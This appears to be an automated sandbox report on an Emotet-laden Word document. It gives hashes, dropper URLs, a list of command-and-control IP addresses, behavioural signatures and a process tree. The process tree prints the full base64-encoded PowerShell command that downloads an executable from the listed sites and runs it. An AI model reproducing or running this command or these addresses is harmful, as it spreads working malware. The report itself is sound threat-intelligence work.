emotet | b788c3eb69332103a2934da12e1a1675bdda621b08a33cd5f6dca0c6980c18c3

General

Target

SecuriteInfo.com.Exploit.Siggen2.11929.5227.9410.doc
Size

168KB
MD5

9818d6a4e594ec8dff03c6fd4115d3fc
SHA1

a0914b69782965ba17fbdf6a26f3a261d368e60e
SHA256

b788c3eb69332103a2934da12e1a1675bdda621b08a33cd5f6dca0c6980c18c3
SHA512

caccb715aaa2ddadf315f7ec072f898fcd05cd257580c359d41162eeedfeef1d50fb2b5c89a749ad39f4f325e1b66c03a4321652a3bd02b7f1c11293cf57a5ee

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://yeichner.com/old/iyv0hf8926444/

exe.dropper

http://ensource.co.uk/EAYO10088k/32eMeaoiq7963578/

exe.dropper

http://withdrake.com/stacymgreen/etqjdgf4343351/

exe.dropper

http://spitzertech.net/wp-content/D9pmd93694/

exe.dropper

http://www.giardinosullamaremma.it/wp-content/MnICFTr/

Extracted

Family

emotet

C2

201.235.10.215:80

198.57.203.63:8080

163.172.107.70:8080

172.105.78.244:8080

107.161.30.122:8080

203.153.216.182:7080

37.46.129.215:8080

201.214.108.231:80

178.33.167.120:8080

181.113.229.139:443

192.210.217.94:8080

24.157.25.203:80

94.96.60.191:80

157.7.164.178:8081

75.127.14.170:8080

189.146.1.78:443

190.164.75.175:80

192.241.220.183:8080

190.55.233.156:80

91.83.93.103:443

rsa_pubkey.plain

Signatures

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXE679.exedpnhupnp.exe

pid process

1464 WINWORD.EXE
1464 WINWORD.EXE
1840 679.exe
1840 679.exe
1560 dpnhupnp.exe
1560 dpnhupnp.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1764 powersheLL.exe

pid	process
1464	WINWORD.EXE
1464	WINWORD.EXE
1840	679.exe
1840	679.exe
1560	dpnhupnp.exe
1560	dpnhupnp.exe

description	pid	process
Token: SeDebugPrivilege	1764	powersheLL.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

679.exe

description	pid	process	target process
PID 1840 wrote to memory of 1560	1840	679.exe	dpnhupnp.exe
PID 1840 wrote to memory of 1560	1840	679.exe	dpnhupnp.exe
PID 1840 wrote to memory of 1560	1840	679.exe	dpnhupnp.exe
PID 1840 wrote to memory of 1560	1840	679.exe	dpnhupnp.exe

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe679.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\MP3DMOD\dpnhupnp.exe	679.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/1840-13-0x00000000003F0000-0x00000000003FC000-memory.dmp	emotet
behavioral1/memory/1840-13-0x00000000003F0000-0x00000000003FC000-memory.dmp	emotet
behavioral1/memory/1560-16-0x0000000000620000-0x000000000062C000-memory.dmp	emotet
behavioral1/memory/1560-16-0x0000000000620000-0x000000000062C000-memory.dmp	emotet

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{DC443C45-90C0-428F-93E2-BA2F42A0935A}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{DC443C45-90C0-428F-93E2-BA2F42A0935A}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1464 WINWORD.EXE

pid	process
1464	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	1700	powersheLL.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exedpnhupnp.exe

pid process

1764 powersheLL.exe
1764 powersheLL.exe
1560 dpnhupnp.exe
1560 dpnhupnp.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

5 1764 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

679.exedpnhupnp.exe

pid process

1840 679.exe
1560 dpnhupnp.exe
Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

pid	process
1764	powersheLL.exe
1764	powersheLL.exe
1560	dpnhupnp.exe
1560	dpnhupnp.exe

flow	pid	process
5	1764	powersheLL.exe

pid	process
1840	679.exe
1560	dpnhupnp.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.11929.5227.9410.doc"
1⤵
- Suspicious use of SetWindowsHookEx
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABKAEsAWQBYAEcAdQBoAHIAPQAnAFUAUgBCAEgAQwBzAHkAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAFIAYABpAHQAYAB5AGAAUABgAFIAbwBUAG8AYwBgAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEsAVQBIAFMAVQByAHcAZAAgAD0AIAAnADYANwA5ACcAOwAkAEEAWgBFAEcAVwBrAGUAaQA9ACcASABKAEYAQwBPAG0AZABoACcAOwAkAFMATgBLAFoAUQBxAGYAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASwBVAEgAUwBVAHIAdwBkACsAJwAuAGUAeABlACcAOwAkAFYARwBQAFMAWQBqAGsAaAA9ACcAQwBSAFAAVABSAGEAdwBjACcAOwAkAFEAVABUAFAASwB2AHcAZQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBFAFQALgB3AGUAYgBDAEwAaQBFAE4AdAA7ACQAQQBQAFYATABWAGMAbwBjAD0AJwBoAHQAdABwADoALwAvAHkAZQBpAGMAaABuAGUAcgAuAGMAbwBtAC8AbwBsAGQALwBpAHkAdgAwAGgAZgA4ADkAMgA2ADQANAA0AC8AKgBoAHQAdABwADoALwAvAGUAbgBzAG8AdQByAGMAZQAuAGMAbwAuAHUAawAvAEUAQQBZAE8AMQAwADAAOAA4AGsALwAzADIAZQBNAGUAYQBvAGkAcQA3ADkANgAzADUANwA4AC8AKgBoAHQAdABwADoALwAvAHcAaQB0AGgAZAByAGEAawBlAC4AYwBvAG0ALwBzAHQAYQBjAHkAbQBnAHIAZQBlAG4ALwBlAHQAcQBqAGQAZwBmADQAMwA0ADMAMwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AcwBwAGkAdAB6AGUAcgB0AGUAYwBoAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARAA5AHAAbQBkADkAMwA2ADkANAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAaQBhAHIAZABpAG4AbwBzAHUAbABsAGEAbQBhAHIAZQBtAG0AYQAuAGkAdAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBNAG4ASQBDAEYAVAByAC8AJwAuACIAcwBQAGwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABFAEQAQwBOAEMAbABnAGsAPQAnAFAAUABNAFUAWgBrAHoAaAAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBEAFgAWgBTAGwAbQBzACAAaQBuACAAJABBAFAAVgBMAFYAYwBvAGMAKQB7AHQAcgB5AHsAJABRAFQAVABQAEsAdgB3AGUALgAiAEQATwBXAGAATgBsAE8AYQBkAGAARgBpAGAATABlACIAKAAkAEEARABYAFoAUwBsAG0AcwAsACAAJABTAE4ASwBaAFEAcQBmAHoAKQA7ACQASgBJAEIAVgBXAHAAdABiAD0AJwBLAE4AUgBGAEYAbQBuAHkAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABTAE4ASwBaAFEAcQBmAHoAKQAuACIAbABgAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADIAMgA5ADcANwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIAZQBBAGAAVABlACIAKAAkAFMATgBLAFoAUQBxAGYAegApADsAJABJAEQARQBMAE8AbAB2AHIAPQAnAEgAUgBGAFUASgBvAG4AdQAnADsAYgByAGUAYQBrADsAJABKAEgATgBUAEIAdQB3AHcAPQAnAEsASgBaAEgAQQBnAGMAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAFgATgBLAEIAeABwAHUAPQAnAEYAVABJAFEAUwBzAHAAcAAnAA==
1⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:1764

C:\Users\Admin\679.exe
C:\Users\Admin\679.exe
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Executes dropped EXE
PID:1840

C:\Windows\SysWOW64\MP3DMOD\dpnhupnp.exe
"C:\Windows\SysWOW64\MP3DMOD\dpnhupnp.exe"
2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:1560

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\679.exe

Download Submit
C:\Users\Admin\679.exe

Download Submit
C:\Windows\SysWOW64\MP3DMOD\dpnhupnp.exe

Download Submit
memory/1464-2-0x00000000088F0000-0x00000000088F4000-memory.dmp

Filesize
16KB

Download
memory/1464-4-0x0000000006DD0000-0x0000000006FD0000-memory.dmp

Filesize
2.0MB

Download
memory/1464-5-0x000000000AD50000-0x000000000AD54000-memory.dmp

Filesize
16KB

Download
memory/1464-6-0x000000000BDD0000-0x000000000BDD4000-memory.dmp

Filesize
16KB

Download
memory/1464-10-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1560-14-0x0000000000000000-mapping.dmp

Download
memory/1560-16-0x0000000000620000-0x000000000062C000-memory.dmp

Filesize
48KB

Download
memory/1840-13-0x00000000003F0000-0x00000000003FC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads